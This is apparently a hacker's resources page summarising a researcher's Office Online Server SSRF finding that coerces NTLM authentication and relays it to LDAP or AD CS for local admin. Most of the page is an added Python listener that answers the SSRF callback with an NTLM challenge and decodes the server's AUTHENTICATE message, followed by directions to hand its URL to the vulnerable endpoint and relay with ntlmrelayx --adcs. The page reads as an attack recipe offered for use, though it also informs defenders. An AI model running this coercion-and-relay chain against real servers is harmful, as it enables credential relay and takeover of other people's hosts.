Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Microsoft Office Online Server Remote Code Execution - 974

Manish Tanwar - MDSec. Posted 3 years ago
  • Office Online Server (OOS) is the on-premises counterpart of Office Online: it renders Word, Excel and PowerPoint documents in the browser.
  • A GET request to /op/view.aspx takes the URL of the document to render, and the server fetches that URL itself: a Server-Side Request Forgery (SSRF). The researcher confirmed it out-of-band by pointing the URL at a Burp Collaborator host and watching the callback arrive.
  • The callback also showed that OOS authenticates to whatever host it fetches from, using its own credentials. The SSRF can therefore be used to coerce the server into authenticated requests to any host the attacker chooses.
  • Exploitation options are the usual NTLM-relay ones: relay the coerced authentication to LDAP to write shadow credentials, then recover a certificate for PKINIT authentication; or relay it with Impacket's ntlmrelayx to Active Directory Certificate Services (AD CS) to have a certificate issued directly. Either certificate yields a TGT for the OOS host's account via PKINIT, and with that TGT the attacker becomes local admin on the Office Online Server host, which is the remote code execution in the title.
  • Microsoft closed the report as won't-fix: the authenticated SSRF is intended behaviour. Their advice was to "lock down ports and any accounts on that farm to have least privilege", which is really disappointing. Overall, a good find!
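The coercion step from the bullets above (the Collaborator callback that turns out to carry the server's own authentication), as an added example that is not code from the MDSec post or from this page: a small listener that answers the SSRF callback with a 401 NTLM challenge and decodes the AUTHENTICATE message the server sends back, so you know which account you are about to relay before pointing ntlmrelayx at LDAP or AD CS. The identity CORP\OOS01$, the /callback path and the fixed server challenge are constructed for the offline demo; the NTLM message layout follows MS-NLMP, with the LM/NT responses left empty in the simulated client, which stands in for the OOS fetcher.

```python
"""Collaborator-style listener that coerces NTLM authentication from the Office
Online Server SSRF and names the account behind it. Added example, not code from
the MDSec post: serve it on a host you control, hand its URL to the vulnerable
endpoint, and the server that fetches it authenticates to you. Offline, a
simulated client plays the OOS role with the constructed identity CORP\\OOS01$."""
import base64
import http.client
import struct
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE, NEGOTIATE_NTLM = 0x00000001, 0x00000200


def ntlm_type(blob):
    """1 NEGOTIATE, 2 CHALLENGE, 3 AUTHENTICATE; 0 if the blob is not NTLMSSP."""
    if len(blob) < 12 or blob[:8] != SIGNATURE:
        return 0
    return struct.unpack_from("<I", blob, 8)[0]


def build_challenge(server_challenge=b"\x11\x22\x33\x44\x55\x66\x77\x88"):
    """Minimal 48-byte CHALLENGE: empty TargetName/TargetInfo (MS-NLMP 2.2.1.2); fixed challenge is for the demo."""
    return (SIGNATURE + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48)      # TargetNameFields
            + struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM | 0x00020000)  # 0x20000 = TARGET_TYPE_SERVER
            + server_challenge + b"\x00" * 8 + struct.pack("<HHI", 0, 0, 48))     # Reserved, TargetInfoFields


def parse_authenticate(blob):
    """(domain, user, workstation) from an AUTHENTICATE message; None if it is not one."""
    if ntlm_type(blob) != 3 or len(blob) < 64:
        return None
    flags = struct.unpack_from("<I", blob, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"   # OEM code page: assumed 437

    def field(off):   # (length, maxlength, offset) descriptor -> decoded payload string
        length, _maxlen, start = struct.unpack_from("<HHI", blob, off)
        if start + length > len(blob):
            raise ValueError("NTLM field runs past the end of the message")
        return blob[start:start + length].decode(enc)
    # DomainNameFields @28, UserNameFields @36, WorkstationFields @44 (MS-NLMP 2.2.1.3)
    return field(28), field(36), field(44)


def build_authenticate(domain, user, workstation):
    """Constructed AUTHENTICATE with empty LM/NT responses: correct layout for the parser and
    the offline demo, not a real response (a real client derives NTLMv2 from the challenge)."""
    names = [n.encode("utf-16-le") for n in (domain, user, workstation)]
    fields, off = b"", 64                          # payload follows the 64-byte header
    for n in names:
        fields += struct.pack("<HHI", len(n), len(n), off)
        off += len(n)
    return (SIGNATURE + struct.pack("<I", 3)
            + struct.pack("<HHI", 0, 0, 64) * 2    # LmChallengeResponse, NtChallengeResponse (empty)
            + fields                               # DomainName, UserName, Workstation
            + struct.pack("<HHI", 0, 0, 64)        # EncryptedRandomSessionKey (empty)
            + struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM) + b"".join(names))


class CoerceHandler(BaseHTTPRequestHandler):
    """Insists on NTLM and records (client address, identity) for every AUTHENTICATE received."""
    captured = []

    def log_message(self, *args):
        pass

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        blob = base64.b64decode(auth[5:]) if auth.startswith("NTLM ") else b""
        kind = ntlm_type(blob)
        if kind == 3:                              # the fetcher just handed us its credentials
            CoerceHandler.captured.append((self.client_address[0], parse_authenticate(blob)))
            self.send_response(200)
        else:                                      # first contact or NEGOTIATE: keep it talking
            self.send_response(401)
            challenge = " " + base64.b64encode(build_challenge()).decode() if kind == 1 else ""
            self.send_header("WWW-Authenticate", "NTLM" + challenge)
        self.end_headers()


def simulated_oos_fetch(host, port, domain, user, workstation):
    """Plays Office Online Server: fetches the URL and, when challenged, authenticates as itself.
    One connection per leg for simplicity; a real client keeps a single TCP connection."""
    negotiate = (SIGNATURE + struct.pack("<I", 1) + struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM)
                 + struct.pack("<HHI", 0, 0, 32) * 2)                      # empty DomainName, Workstation
    statuses = []
    for token in (None, negotiate, build_authenticate(domain, user, workstation)):
        headers = {} if token is None else {"Authorization": "NTLM " + base64.b64encode(token).decode()}
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("GET", "/callback", headers=headers)
        resp = conn.getresponse()
        resp.read()
        statuses.append(resp.status)
        conn.close()
    return statuses


def run_demo():
    """Listener on an ephemeral loopback port, simulated victim against it; returns (statuses, identities)."""
    CoerceHandler.captured = []
    srv = HTTPServer(("127.0.0.1", 0), CoerceHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        statuses = simulated_oos_fetch("127.0.0.1", srv.server_address[1], "CORP", "OOS01$", "OOS01")
    finally:
        srv.shutdown()
        srv.server_close()
    return statuses, [ident for _addr, ident in CoerceHandler.captured]


if __name__ == "__main__":
    for domain, user, workstation in run_demo()[1]:
        print(f"coerced authentication from {domain}\\{user} (workstation {workstation})")
```

Run stand-alone, the simulated victim goes through 401, 401, 200 and the listener reports a coerced authentication from CORP\OOS01$. In the field the listener's role is taken by Impacket's ntlmrelayx.py (for example with --adcs), which forwards the same three-leg exchange to the CA's web enrollment endpoint instead of merely decoding it; that is the relay the post describes.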